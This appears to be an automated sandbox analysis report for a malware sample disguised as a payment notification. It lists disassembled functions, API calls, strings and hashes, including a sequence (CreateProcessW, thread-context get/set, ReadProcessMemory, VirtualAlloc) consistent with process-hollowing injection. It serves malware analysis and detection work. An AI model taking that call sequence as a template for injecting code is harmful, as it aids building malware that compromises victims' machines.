                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                              • String ID: #$0$AutoIt v3
                                                                              • API String ID: 423443420-4155596026
                                                                              • Opcode ID: 02c18ddbf7a77d5e1e5a9b13ceaf9124a8c649b26283ab428a54dded4441d813
                                                                              • Instruction ID: 2091659c7797e0a9ca701049402cba64085626fc5782115fc8cf22f34a2e36a1
                                                                              • Opcode Fuzzy Hash: 02c18ddbf7a77d5e1e5a9b13ceaf9124a8c649b26283ab428a54dded4441d813
                                                                              • Instruction Fuzzy Hash: 632150B2E28354AFDB109FA5ED65B9D7FF4FB08B60F50011AF504A66A0E7B10540EF90

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 443 8e3170-8e3185 444 8e3187-8e318a 443->444 445 8e31e5-8e31e7 443->445 446 8e318c-8e3193 444->446 447 8e31eb 444->447 445->444 448 8e31e9 445->448 451 8e3199-8e319e 446->451 452 8e3265-8e326d PostQuitMessage 446->452 449 922dfb-922e23 call 8e18e2 call 8fe499 447->449 450 8e31f1-8e31f6 447->450 453 8e31d0-8e31d8 DefWindowProcW 448->453 489 922e28-922e2f 449->489 454 8e321d-8e3244 SetTimer RegisterWindowMessageW 450->454 455 8e31f8-8e31fb 450->455 457 8e31a4-8e31a8 451->457 458 922e7c-922e90 call 94bf30 451->458 460 8e3219-8e321b 452->460 459 8e31de-8e31e4 453->459 454->460 464 8e3246-8e3251 CreatePopupMenu 454->464 461 922d9c-922d9f 455->461 462 8e3201-8e3214 KillTimer call 8e30f2 call 8e3c50 455->462 465 8e31ae-8e31b3 457->465 466 922e68-922e77 call 94c161 457->466 458->460 482 922e96 458->482 460->459 474 922da1-922da5 461->474 475 922dd7-922df6 MoveWindow 461->475 462->460 464->460 471 8e31b9-8e31be 465->471 472 922e4d-922e54 465->472 466->460 480 8e31c4-8e31ca 471->480 481 8e3253-8e3263 call 8e326f 471->481 472->453 476 922e5a-922e63 call 940ad7 472->476 483 922dc6-922dd2 SetFocus 474->483 484 922da7-922daa 474->484 475->460 476->453 480->453 480->489 481->460 482->453 483->460 484->480 485 922db0-922dc1 call 8e18e2 484->485 485->460 489->453 493 922e35-922e48 call 8e30f2 call 8e3837 489->493 493->453
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,008E316A,?,?), ref: 008E31D8
                                                                              • KillTimer.USER32(?,00000001,?,?,?,?,?,008E316A,?,?), ref: 008E3204
                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008E3227
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,008E316A,?,?), ref: 008E3232
                                                                              • CreatePopupMenu.USER32 ref: 008E3246
                                                                              • PostQuitMessage.USER32(00000000), ref: 008E3267
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                              • String ID: TaskbarCreated
                                                                              • API String ID: 129472671-2362178303
                                                                              • Opcode ID: 2cbefb6554978aec0f10a0a18af182775a7aa5b92236c86a485b77a71720ff65
                                                                              • Instruction ID: 43001c6661ee0fb79b3c2dca610f06b8dac180e24d1d92eaf9c5af852f09858d
                                                                              • Opcode Fuzzy Hash: 2cbefb6554978aec0f10a0a18af182775a7aa5b92236c86a485b77a71720ff65
                                                                              • Instruction Fuzzy Hash: 78419C31228284B7DB291B39AE1DBB93659F747355F44022DF646C72A1DB70CE40A762

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 499 41bf860-41bf90e call 41bd270 502 41bf915-41bf93b call 41c0770 CreateFileW 499->502 505 41bf93d 502->505 506 41bf942-41bf952 502->506 507 41bfa8d-41bfa91 505->507 511 41bf959-41bf973 VirtualAlloc 506->511 512 41bf954 506->512 509 41bfad3-41bfad6 507->509 510 41bfa93-41bfa97 507->510 513 41bfad9-41bfae0 509->513 514 41bfa99-41bfa9c 510->514 515 41bfaa3-41bfaa7 510->515 518 41bf97a-41bf991 ReadFile 511->518 519 41bf975 511->519 512->507 520 41bfae2-41bfaed 513->520 521 41bfb35-41bfb4a 513->521 514->515 516 41bfaa9-41bfab3 515->516 517 41bfab7-41bfabb 515->517 516->517 524 41bfacb 517->524 525 41bfabd-41bfac7 517->525 526 41bf998-41bf9d8 VirtualAlloc 518->526 527 41bf993 518->527 519->507 528 41bfaef 520->528 529 41bfaf1-41bfafd 520->529 522 41bfb5a-41bfb62 521->522 523 41bfb4c-41bfb57 VirtualFree 521->523 523->522 524->509 525->524 530 41bf9da 526->530 531 41bf9df-41bf9fa call 41c09c0 526->531 527->507 528->521 532 41bfaff-41bfb0f 529->532 533 41bfb11-41bfb1d 529->533 530->507 539 41bfa05-41bfa0f 531->539 537 41bfb33 532->537 534 41bfb2a-41bfb30 533->534 535 41bfb1f-41bfb28 533->535 534->537 535->537 537->513 540 41bfa42-41bfa56 call 41c07d0 539->540 541 41bfa11-41bfa40 call 41c09c0 539->541 547 41bfa5a-41bfa5e 540->547 548 41bfa58 540->548 541->539 549 41bfa6a-41bfa6e 547->549 550 41bfa60-41bfa64 CloseHandle 547->550 548->507 551 41bfa7e-41bfa87 549->551 552 41bfa70-41bfa7b VirtualFree 549->552 550->549 551->502 551->507 552->551
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 041BF931
                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 041BFB57
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1707992061.00000000041BD000.00000040.00000020.00020000.00000000.sdmp, Offset: 041BD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_41bd000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileFreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 204039940-0
                                                                              • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                              • Instruction ID: 8b0542abdbf1e1c3e967ef49e9a1814126e3c8ba51a0e46088c1fbbe8d8d733c
                                                                              • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                              • Instruction Fuzzy Hash: E2A10B74E00209EBDB18CFA4C994BEEBBB5FF48304F208599E545BB280D775AA41CF94

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 563 8e2c63-8e2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                              APIs
                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008E2C91
                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008E2CB2
                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,008E1CAD,?), ref: 008E2CC6
                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,008E1CAD,?), ref: 008E2CCF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateShow
                                                                              • String ID: AutoIt v3$edit
                                                                              • API String ID: 1584632944-3779509399
                                                                              • Opcode ID: 36115414f1aedd1dba3c5a2729b77aa5b5e4ebda1e4cbf6e0d7cd52b17d6dd7a
                                                                              • Instruction ID: 15c70c90bf6f24a7f16b94de93a170a7267747b000f2fc078c7a79d1d03c726c
                                                                              • Opcode Fuzzy Hash: 36115414f1aedd1dba3c5a2729b77aa5b5e4ebda1e4cbf6e0d7cd52b17d6dd7a
                                                                              • Instruction Fuzzy Hash: DFF03AB66642907AEB300723AC18E772EFDD7C6F60F54411EFA04A21A0E6610840EBB0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 678 41bf620-41bf759 call 41bd270 call 41bf510 CreateFileW 685 41bf75b 678->685 686 41bf760-41bf770 678->686 687 41bf810-41bf815 685->687 689 41bf772 686->689 690 41bf777-41bf791 VirtualAlloc 686->690 689->687 691 41bf793 690->691 692 41bf795-41bf7ac ReadFile 690->692 691->687 693 41bf7ae 692->693 694 41bf7b0-41bf7ea call 41bf550 call 41be510 692->694 693->687 699 41bf7ec-41bf801 call 41bf5a0 694->699 700 41bf806-41bf80e ExitProcess 694->700 699->700 700->687
                                                                              APIs
                                                                                • Part of subcall function 041BF510: Sleep.KERNELBASE(000001F4), ref: 041BF521
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 041BF74F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1707992061.00000000041BD000.00000040.00000020.00020000.00000000.sdmp, Offset: 041BD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_41bd000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileSleep
                                                                              • String ID: GTNX8GHYG317VXPY7GBGMAQW
                                                                              • API String ID: 2694422964-293475428
                                                                              • Opcode ID: b7b1315ab6f7d62d4db4ba4fd6e574778aae89acc560896008c13b189c6dba57
                                                                              • Instruction ID: 747a55e15143e9cdb111dfe682b3016b45e4d9cd9aa57bbfb8a3f845649ac4d6
                                                                              • Opcode Fuzzy Hash: b7b1315ab6f7d62d4db4ba4fd6e574778aae89acc560896008c13b189c6dba57
                                                                              • Instruction Fuzzy Hash: 1C519570D04289DAEF11DBA8CC55BEEBBB49F05304F004599E648BB2C1D7B91B49CBA5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 738 8e3b1c-8e3b27 739 8e3b99-8e3b9b 738->739 740 8e3b29-8e3b2e 738->740 742 8e3b8c-8e3b8f 739->742 740->739 741 8e3b30-8e3b48 RegOpenKeyExW 740->741 741->739 743 8e3b4a-8e3b69 RegQueryValueExW 741->743 744 8e3b6b-8e3b76 743->744 745 8e3b80-8e3b8b RegCloseKey 743->745 746 8e3b78-8e3b7a 744->746 747 8e3b90-8e3b97 744->747 745->742 748 8e3b7e 746->748 747->748 748->745
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,008E3B0F,SwapMouseButtons,00000004,?), ref: 008E3B40
                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,008E3B0F,SwapMouseButtons,00000004,?), ref: 008E3B61
                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,008E3B0F,SwapMouseButtons,00000004,?), ref: 008E3B83
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID: Control Panel\Mouse
                                                                              • API String ID: 3677997916-824357125
                                                                              • Opcode ID: 943029f5403c18c13af5867561068ab75728ff3def97446552416a243aa09068
                                                                              • Instruction ID: 138c870f523182f876e39726db9546ee4798ffce5e6e5abaad04edc34de04b8b
                                                                              • Opcode Fuzzy Hash: 943029f5403c18c13af5867561068ab75728ff3def97446552416a243aa09068
                                                                              • Instruction Fuzzy Hash: 7A112AB5620248FFDB208FA6DC48AAEB7B8FF86754B104559E806D7110D2319E40A7A0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 749 41be510-41be5b0 call 41c09a0 * 3 756 41be5b2-41be5bc 749->756 757 41be5c7 749->757 756->757 758 41be5be-41be5c5 756->758 759 41be5ce-41be5d7 757->759 758->759 760 41be5de-41bec90 759->760 761 41beca3-41becd0 CreateProcessW 760->761 762 41bec92-41bec96 760->762 768 41becda 761->768 769 41becd2-41becd5 761->769 763 41bec98-41bec9c 762->763 764 41becdc-41bed09 762->764 766 41bec9e 763->766 767 41bed15-41bed42 763->767 784 41bed0b-41bed0e 764->784 785 41bed13 764->785 771 41bed4c-41bed66 Wow64GetThreadContext 766->771 767->771 791 41bed44-41bed47 767->791 768->771 774 41bf0d1-41bf0d3 769->774 772 41bed68 771->772 773 41bed6d-41bed88 ReadProcessMemory 771->773 776 41bf07a-41bf07e 772->776 777 41bed8a 773->777 778 41bed8f-41bed98 773->778 782 41bf0cf 776->782 783 41bf080-41bf084 776->783 777->776 780 41bed9a-41beda9 778->780 781 41bedc1-41bede0 call 41c0020 778->781 780->781 787 41bedab-41bedba call 41bff70 780->787 800 41bede2 781->800 801 41bede7-41bee0a call 41c0160 781->801 782->774 788 41bf099-41bf09d 783->788 789 41bf086-41bf092 783->789 784->774 785->771 787->781 804 41bedbc 787->804 794 41bf0a9-41bf0ad 788->794 795 41bf09f-41bf0a2 788->795 789->788 791->774 796 41bf0b9-41bf0bd 794->796 797 41bf0af-41bf0b2 794->797 795->794 802 41bf0ca-41bf0cd 796->802 803 41bf0bf-41bf0c5 call 41bff70 796->803 797->796 800->776 808 41bee0c-41bee13 801->808 809 41bee54-41bee75 call 41c0160 801->809 802->774 803->802 804->776 810 41bee4f 808->810 811 41bee15-41bee46 call 41c0160 808->811 816 41bee7c-41bee9a call 41c09c0 809->816 817 41bee77 809->817 810->776 818 41bee48 811->818 819 41bee4d 811->819 822 41beea5-41beeaf 816->822 817->776 818->776 819->809 823 41beeb1-41beee3 call 41c09c0 822->823 824 41beee5-41beee9 822->824 823->822 826 41beeef-41beeff 824->826 827 41befd4-41beff1 call 41bfb70 824->827 826->827 830 41bef05-41bef15 826->830 834 41beff8-41bf017 Wow64SetThreadContext 827->834 835 41beff3 827->835 830->827 833 41bef1b-41bef3f 830->833 836 41bef42-41bef46 833->836 837 41bf01b-41bf026 call 41bfea0 834->837 838 41bf019 834->838 835->776 836->827 839 41bef4c-41bef61 836->839 845 41bf02a-41bf02e 837->845 846 41bf028 837->846 838->776 841 41bef75-41bef79 839->841 843 41bef7b-41bef87 841->843 844 41befb7-41befcf 841->844 847 41bef89-41befb3 843->847 848 41befb5 843->848 844->836 849 41bf03a-41bf03e 845->849 850 41bf030-41bf033 845->850 846->776 847->848 848->841 852 41bf04a-41bf04e 849->852 853 41bf040-41bf043 849->853 850->849 854 41bf05a-41bf05e 852->854 855 41bf050-41bf053 852->855 853->852 856 41bf06b-41bf074 854->856 857 41bf060-41bf066 call 41bff70 854->857 855->854 856->760 856->776 857->856
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 041BECCB
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 041BED61
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 041BED83
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1707992061.00000000041BD000.00000040.00000020.00020000.00000000.sdmp, Offset: 041BD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_41bd000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                              • Instruction ID: 57e3a14045c9b3a7b2a93ddb3e14e60ed87be036e48271b677ced38d2e0e4bd8
                                                                              • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                              • Instruction Fuzzy Hash: 9462EC30A14658DBEB24CFA4CC90BDEB776EF58300F1091A9D10DEB2A4E7759E81CB59
                                                                              Strings
                                                                              • Variable must be of type 'Object'., xrefs: 009332B7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Variable must be of type 'Object'.
                                                                              • API String ID: 0-109567571
                                                                              • Opcode ID: a5fd3b9fb6439487ba148926d87dd07fb35bdf029b783213e7eb706ae6e11fe5
                                                                              • Instruction ID: a371b0c4d6928c44be04b45427e4c1761d266b45c219eeda48fbbe8831d1e0c8
                                                                              • Opcode Fuzzy Hash: a5fd3b9fb6439487ba148926d87dd07fb35bdf029b783213e7eb706ae6e11fe5
                                                                              • Instruction Fuzzy Hash: ABC29B71A00259DFCB24CF69C880AADB7B1FF1A314F248169E956EB3A1D371ED41CB91

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1370 8e3923-8e3939 1371 8e393f-8e3954 call 8e6270 1370->1371 1372 8e3a13-8e3a17 1370->1372 1375 923393-9233a2 LoadStringW 1371->1375 1376 8e395a-8e3976 call 8e6b57 1371->1376 1378 9233ad-9233b6 1375->1378 1382 8e397c-8e3980 1376->1382 1383 9233c9-9233e5 call 8e6350 call 8e3fcf 1376->1383 1380 8e3994-8e3a0e call 902340 call 8e3a18 call 904983 Shell_NotifyIconW call 8e988f 1378->1380 1381 9233bc-9233c4 call 8ea8c7 1378->1381 1380->1372 1381->1380 1382->1378 1384 8e3986-8e398f call 8e6350 1382->1384 1383->1380 1396 9233eb-923409 call 8e33c6 call 8e3fcf call 8e33c6 1383->1396 1384->1380 1396->1380
                                                                              APIs
                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009233A2
                                                                                • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008E3A04
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoadNotifyShell_String_wcslen
                                                                              • String ID: Line:
                                                                              • API String ID: 2289894680-1585850449
                                                                              • Opcode ID: ad382b0a777467002f66de1e22a3007471b658f28a15e40e7bfa2893951b9471
                                                                              • Instruction ID: c94a7681c2cb88397a578abab713ff785233dcfd0ecb6ca9e84a94173f2233f1
                                                                              • Opcode Fuzzy Hash: ad382b0a777467002f66de1e22a3007471b658f28a15e40e7bfa2893951b9471
                                                                              • Instruction Fuzzy Hash: 8831C271418394AAC325EB25DC49BEBB7D8FF82724F50462AF599C3191EB709A48C7C3
                                                                              APIs
                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00900668
                                                                                • Part of subcall function 009032A4: RaiseException.KERNEL32(?,?,?,0090068A,?,009B1444,?,?,?,?,?,?,0090068A,008E1129,009A8738,008E1129), ref: 00903304
                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00900685
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                              • String ID: Unknown exception
                                                                              • API String ID: 3476068407-410509341
                                                                              • Opcode ID: b83f64f19b92643294ecaedb215f6a21c2d258df6f07b2636477138f54c55ac6
                                                                              • Instruction ID: c74cdf7927a7ced5e64b6f540f8db469b57a3ca93674f4357a24629098ce21c1
                                                                              • Opcode Fuzzy Hash: b83f64f19b92643294ecaedb215f6a21c2d258df6f07b2636477138f54c55ac6
                                                                              • Instruction Fuzzy Hash: 60F0442490020D6FCB10B675DC46F5E776DAEC0354F604531BA24D65D2EF71DA6589C0
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 009682F5
                                                                              • TerminateProcess.KERNEL32(00000000), ref: 009682FC
                                                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 009684DD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentFreeLibraryTerminate
                                                                              • String ID:
                                                                              • API String ID: 146820519-0
                                                                              • Opcode ID: b2fcdb21bc98ecc779ea118e754b078835d29e953f4680a29f435dfb2630e5c6
                                                                              • Instruction ID: acc18e9b5cd1b756d837c93b2a4a688a069687164545a219deec215159c77a35
                                                                              • Opcode Fuzzy Hash: b2fcdb21bc98ecc779ea118e754b078835d29e953f4680a29f435dfb2630e5c6
                                                                              • Instruction Fuzzy Hash: 37126B71A083419FC714DF28C484B6ABBE5FF89318F048A5DE8998B352DB71ED45CB92
                                                                              APIs
                                                                                • Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008E1BF4
                                                                                • Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 008E1BFC
                                                                                • Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008E1C07
                                                                                • Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008E1C12
                                                                                • Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 008E1C1A
                                                                                • Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 008E1C22
                                                                                • Part of subcall function 008E1B4A: RegisterWindowMessageW.USER32(00000004,?,008E12C4), ref: 008E1BA2
                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008E136A
                                                                              • OleInitialize.OLE32 ref: 008E1388
                                                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 009224AB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                              • String ID:
                                                                              • API String ID: 1986988660-0
                                                                              • Opcode ID: ff26eec7b2beae9c1c49e1a71612f0da5849a2c1073d3dc12bfc4ca754e397be
                                                                              • Instruction ID: 2e12c046835f2eb05047788c8257edba38602bc180b62c3ce7e4e0a3700defc5
                                                                              • Opcode Fuzzy Hash: ff26eec7b2beae9c1c49e1a71612f0da5849a2c1073d3dc12bfc4ca754e397be
                                                                              • Instruction Fuzzy Hash: B271C2B59293408FC7A4DF7AAA656953BE1FB893603D4832EE01AC7271EBB04440EF51
                                                                              APIs
                                                                              • CloseHandle.KERNELBASE(00000000,00000000,?,?,009185CC,?,009A8CC8,0000000C), ref: 00918704
